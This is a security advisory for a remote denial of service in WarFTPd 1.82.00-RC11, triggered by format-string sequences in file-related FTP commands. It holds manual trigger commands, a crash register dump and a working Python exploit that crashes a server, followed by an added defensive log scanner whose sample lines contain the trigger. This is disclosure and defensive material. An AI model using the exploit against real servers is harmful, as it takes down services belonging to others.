WarFTPd 1.82.00-RC11 Remote Denial Of Service

2006.11.09
Risk: Low
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

WarFTPd 1.82.00-RC11 Remote Denial Of Service
---------------------------------------------

WarFTPd is vulnerable to a DoS condition when a long string containing two or more "%s" sequences is passed to various commands. It looks non-exploitable, as the process crashes with the same output, at the same instruction and address, regardless of the buffer size and of the %${char} specifier passed. Perhaps someone else will find it exploitable.

Example:

  $ ftp target
  (Banner)
  ftp> quote user anonymous
  ftp> quote pass bla
  ftp> cwd %s*256

or

  ftp> cdup %s*256

The server will crash as follows:

  EAX 00000001
  ECX 00000073
  EDX 00000002
  EBX 0079E890
  ESP 0079E7A0
  EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s characters)"
  ESI 0079E7DE
  EDI 0000000A
  EIP 00431540 war-ftpd.00431540

  00431540  8A08  MOV CL,BYTE PTR DS:[EAX]

Only one shot is needed. Any file-related operation will crash the server.

It was found during an FTP fuzzing session. The following commands were found vulnerable (at least):

  CWD
  CDUP
  DELE
  NLST
  LIST
  SIZE

That is, any file-related operation. A Python exploit is attached below.

Disclaimer
----------

The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

------------------------------------------------------------------------

Contact
-------

Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

------------------------------------------------------------------------

Attached exploit (Python 2):

#!/usr/bin/env python
import sys
import ftplib

print "WAR_FTPD Remote Denial Of Service (DOS)"
print "Copyright (c) Joxean Koret"
print

target = "192.168.1.13"
targetPort = "21"

# Connect and log in anonymously; bail out if the server is not reachable.
try:
    ftp = ftplib.FTP()
    print "[+] Connecting to target "
    msg = ftp.connect(target, targetPort)
    print "[+] Ok. Target banner"
    print msg
    print
    print "[+] Trying to logging anonymously"
    msg = ftp.login()  # Anonymous
    print "[+] Ok. Message"
    print msg
    print
except:
    print "[!] Exploit doesn't work. " + str(sys.exc_info()[1])
    sys.exit(0)

# Two "%s" specifiers are enough; the remainder of the buffer is padding.
a = "%s%s"
"""
for i in range(0):
    a += a
"""
b = "AAAA"
for i in range(6):
    b += b
a = a + b

print "[+] Exploiting with a buffer of " + str(len(a)) + " byte(s) ... "
try:
    ftp.cwd(a)
except:
    # The CWD failed; check whether the server is still accepting connections.
    print "[+] Exploit apparently works. Trying to verify it ... "
    try:
        ftp.connect(target, targetPort)
        print "[!] No, it doesn't work [" + str(sys.exc_info()[1]) + "] :("
    except:
        print "[!] Ok. Server is dead, exploit successfully executed. "
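The advisory describes the trigger as a file-related FTP command whose argument carries two or more printf-style specifiers. The script below is an added example for defenders, not part of the original advisory and not WarFTPd code: it scans FTP command logs for that pattern and also shows the server-side argument check that would refuse such paths. The log line layout (timestamp, client address, command, argument) and all sample lines are constructed for the example; WarFTPd's real log format is not on the page.

```python
import re

# File-related commands the advisory lists as crashing WarFTPd 1.82.00-RC11.
FILE_COMMANDS = {"CWD", "CDUP", "DELE", "NLST", "LIST", "SIZE"}

# A printf-style conversion: '%' followed by optional flags, width, precision
# and a conversion character. "%%" is a literal percent and is dropped first.
FORMAT_SPEC = re.compile(r"%[-+ #0]*\d*(?:\.\d+)?[diouxXeEfgGcspn]")


def parse_ftp_log_line(line):
    """Split a constructed 'timestamp client COMMAND [argument]' log line.

    Returns None for lines that do not have at least three fields.
    """
    parts = line.strip().split(" ", 3)
    if len(parts) < 3:
        return None
    return {
        "ts": parts[0],
        "client": parts[1],
        "command": parts[2].upper(),
        "argument": parts[3] if len(parts) == 4 else "",
    }


def analyze_argument(argument):
    """Count conversion specifiers in a command argument."""
    literal_free = argument.replace("%%", "")
    specs = FORMAT_SPEC.findall(literal_free)
    return {"spec_count": len(specs), "length": len(argument)}


def is_safe_path_argument(argument):
    """Server-side check: refuse path arguments that contain any specifier.

    A legitimate path may contain a bare '%' (e.g. 'report-100%.txt'); only a
    '%' that forms a conversion is rejected.
    """
    return analyze_argument(argument)["spec_count"] == 0


def flag_ftp_line(line, min_specs=2):
    """Return an alert for a file-related command carrying >= min_specs
    conversion specifiers in its argument, otherwise None."""
    rec = parse_ftp_log_line(line)
    if rec is None or rec["command"] not in FILE_COMMANDS:
        return None
    info = analyze_argument(rec["argument"])
    if info["spec_count"] < min_specs:
        return None
    return {
        "ts": rec["ts"],
        "client": rec["client"],
        "command": rec["command"],
        "spec_count": info["spec_count"],
        "arg_length": info["length"],
    }


def scan(lines, min_specs=2):
    """Run flag_ftp_line over a sequence of log lines and keep the alerts."""
    return [a for a in (flag_ftp_line(l, min_specs) for l in lines) if a]


# Constructed sample log: two benign file operations, a benign path with a
# literal '%', and two arguments shaped like the advisory's trigger.
SAMPLE_LOG = [
    "2006-11-09T10:00:01 10.0.0.5 USER anonymous",
    "2006-11-09T10:00:02 10.0.0.5 PASS bla",
    "2006-11-09T10:00:03 10.0.0.5 CWD /pub/incoming",
    "2006-11-09T10:00:04 10.0.0.5 LIST -la",
    "2006-11-09T10:00:05 10.0.0.5 SIZE report-100%.txt",
    "2006-11-09T10:00:06 10.0.0.5 CWD " + "%s" * 256,
    "2006-11-09T10:00:07 10.0.0.7 DELE %d%x",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print("ALERT %(ts)s %(client)s %(command)s: %(spec_count)d specifiers "
              "in a %(arg_length)d-byte argument" % alert)
```

The threshold of two specifiers matches the advisory's observation that two "%s" sequences are enough; `is_safe_path_argument` is the check a server's command dispatcher would apply before handing the argument to any file routine, and it deliberately tolerates a lone '%' in a filename so that legitimate paths are not refused.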


Copyright 2022, cxsecurity.com

 
